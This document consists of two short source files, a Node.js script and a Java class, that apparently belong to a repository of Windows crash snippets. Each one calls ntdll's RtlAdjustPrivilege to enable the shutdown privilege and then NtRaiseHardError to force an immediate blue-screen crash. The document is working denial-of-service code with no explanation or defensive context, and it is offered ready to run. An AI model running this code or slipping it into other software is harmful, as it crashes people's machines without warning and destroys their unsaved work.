File: Windows/NodeJS/bsod.js
const ffi = require('ffi-napi');
const ref = require('ref-napi');

const ntdll = ffi.Library('ntdll', {
    'RtlAdjustPrivilege': ['int', ['uint', 'bool', 'bool', ref.refType('bool')]],
    'NtRaiseHardError': ['int', ['uint', 'uint', 'uint', 'pointer', 'uint', ref.refType('uint')]]
});

const enabled = ref.alloc('bool');
const response = ref.alloc('uint');

ntdll.RtlAdjustPrivilege(19, true, false, enabled);
ntdll.NtRaiseHardError(0xC0000420, 0, 0, null, 6, response);

File: Windows/Java/Bsod.java
import com.sun.jna.Library;
import com.sun.jna.Native;
import com.sun.jna.Pointer;
import com.sun.jna.ptr.IntByReference;

public class Bsod {
    public interface Ntdll extends Library {
        Ntdll INSTANCE = Native.load("ntdll", Ntdll.class);
        int RtlAdjustPrivilege(int Privilege, boolean Enable, boolean CurrentThread, IntByReference Enabled);
        int NtRaiseHardError(int ErrorStatus, int NumberOfParameters, int UnicodeStringParameterMask, Pointer Parameters, int ValidResponseOptions, IntByReference Response);
    }

    public static void main(String[] args) {
        IntByReference enabled = new IntByReference();
        IntByReference response = new IntByReference();
        
        Ntdll.INSTANCE.RtlAdjustPrivilege(19, true, false, enabled);
        Ntdll.INSTANCE.NtRaiseHardError(0xC0000420, 0, 0, null, 6, response);
    }
}

